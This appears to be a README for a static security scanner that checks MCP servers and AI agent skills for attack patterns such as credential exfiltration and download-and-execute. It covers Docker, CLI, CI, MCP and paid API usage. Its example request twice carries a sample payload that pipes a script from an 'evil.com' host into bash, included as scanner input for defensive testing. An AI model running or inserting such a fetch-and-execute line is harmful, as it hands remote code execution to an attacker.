skill-audit-mcp
Static security scanner for MCP servers, AI agent skills, and plugins. 68 attack patterns across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.
⚡ Try it in 30 seconds
# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work
# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
-H "Content-Type: application/json" \
-d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'
# Option C: GitHub Action (CI/CD) — see below
📡 Featured in
Cross-referenced from the discovery channels that AI/security engineers actually read:
Four ways to use:
1. GitHub Action (CI/CD)
Add to your workflow to automatically scan PRs:
name: MCP Security Audit
on: [pull_request]
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: eltociear/skill-audit-mcp@v1
with:
path: '.'
fail-on: 'HIGH'
With SARIF upload (shows findings in GitHub Security tab):
- uses: eltociear/skill-audit-mcp@v1
with:
path: '.'
sarif: 'results.sarif'
- uses: github/codeql-action/upload-sarif@v3
if: always()
with:
sarif_file: 'results.sarif'
2. CLI (npx)
# Scan a file
npx @eltociear/skill-audit-mcp --path ./server.py
# Scan a directory
npx @eltociear/skill-audit-mcp --path ./mcp-servers/
# JSON output
npx @eltociear/skill-audit-mcp --path . --json
# SARIF output
npx @eltociear/skill-audit-mcp --path . --sarif results.sarif
# Fail if HIGH or CRITICAL findings
npx @eltociear/skill-audit-mcp --path . --fail-on HIGH
Or install globally:
npm install -g @eltociear/skill-audit-mcp
mcp-audit --path ./server.py
3. MCP Server (Claude Desktop / Cursor)
Add to your MCP config:
{
"skill-audit-mcp": {
"type": "stdio",
"command": "python3",
"args": ["path/to/scanner.py"]
}
}
Then ask Claude: "Audit this MCP server for security issues"
What it detects
| Severity | Patterns |
|---|
| CRITICAL | Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting |
| HIGH | External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation |
| MEDIUM | Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection |
| LOW | External URL references, broad filesystem access |
Risk scoring
- 0-10: SAFE
- 11-25: LOW
- 26-50: MEDIUM
- 51-75: HIGH
- 76-100: CRITICAL
Sister project — secrets-audit-mcp
For leaked credentials and API keys (vs behavioral patterns covered here),
see secrets-audit-mcp —
32 provider rules (AWS / GCP / GitHub / Stripe / OpenAI / Anthropic / Slack /
Discord / Telegram / npm / Docker / Web3 / private keys). Same zero-dep,
single-file stdio MCP server design.
| Layer | Server | Detects |
|---|
| Behaviors | skill-audit-mcp (this) | curl-pipe-sh, prompt injection, exfiltration (68 patterns) |
| Secrets | secrets-audit-mcp | leaked keys/tokens/PEMs (32 rules) |
Run both for full coverage.
4. Docker (offline, multi-arch)
Zero-install scanner image at ghcr.io/eltociear/skill-audit-mcp:v1 — linux/amd64 + linux/arm64.
# Scan the current directory, fail on HIGH or higher
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
--path /work --min-severity MEDIUM --fail-on HIGH
# Get SARIF for upload to GitHub Code Scanning
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
--path /work --sarif-output /work/audit.sarif
5. Hosted API (x402 pay-per-scan)
No signup, no account. Pay $0.01 USDC per scan via x402 micropayment on Base. Free tier: 1,000 scans/month, 0% platform fee.
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
-H "Content-Type: application/json" \
-d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'
# Or by URL:
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
-H "Content-Type: application/json" \
-d '{"url": "https://github.com/some-org/some-mcp-server"}'
First call returns HTTP 402 with a payment requirement (x402 v2 protocol). Settle via @bankr/cli, then retry.
6. pre-commit hook
Add to your .pre-commit-config.yaml:
repos:
- repo: https://github.com/eltociear/skill-audit-mcp
rev: v1.0.1
hooks:
- id: skill-audit-mcp
Hire me for an audit
Need a deeper review than the automated scanner can give? I take freelance
MCP / AI agent security audits at three tiers:
| Tier | Price | Deliverable |
|---|
| Spot scan | $500 | Full repo scan + 1-page risk report with prioritized fixes |
| Standard | $2,000 | Manual review + PoC for HIGH/CRITICAL findings + remediation PR |
| Engagement | $5,000+ | Pentest, threat model, retest after fixes, 30-day Slack support |
Track record: 68+ real CVEs surfaced across 136+ scanned MCP repos
(reports prepared for bytebase/dbhub, mysql_mcp_server, applescript-mcp,
docker-mcp).
Email: eltociear@gmail.com (subject: "MCP audit")
Or buy a one-off MCP Security Audit Report ($5) directly: polar.sh/eltociear.
Sponsors
If skill-audit-mcp saved your bacon — or you just want to keep new
detection rules shipping — I happily accept sponsorships:
Security
Found a vulnerability in skill-audit-mcp itself? Report via private security advisory — see SECURITY.md for the response timeline.
Found a vulnerability in a third-party MCP server using skill-audit-mcp? Report it to that project's security policy or via huntr.com.
Star history
License
MIT
Free MCP vs paid x402
This MCP server is free. For server-side / batch / no-install use, the same scanner is a pay-per-call x402 HTTP API: POST https://eltociear-skill-audit.hf.space/audit ($0.01 USDC on Base) and /audit/url ($0.03). In the official MCP Registry as io.github.eltociear/skill-audit-mcp.
